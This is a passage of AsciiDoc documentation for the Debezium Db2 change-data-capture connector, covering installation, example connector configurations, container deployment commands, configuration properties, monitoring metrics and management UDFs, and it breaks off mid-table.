xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.db2.Db2Connector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 50000\n database.user: db2inst1\n database.password: Password!\n database.dbname: mydatabase\n database.server.name: fullfillment \/\/ <5>\n database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance. \n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* The {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive. \n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `database.hostname`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `database.port`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `database.user`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `database.dbname`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `database.server{zwsp}.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `database.history{zwsp}.kafka.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]\n[[db2-property-table-include-list]]<<db2-property-table-include-list, `table.include.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]\n[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `table.exclude.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]\n[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorthims and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which uses millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `tombstones.on{zwsp}.delete`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `column.truncate.to.{zwsp}_length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `column.mask{zwsp}.with._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `message.key{zwsp}.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `snapshot.isolation{zwsp}.mode`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling{zwsp}.mode`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. +\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `max.queue.size.in.bytes`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `provide.transaction{zwsp}.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES 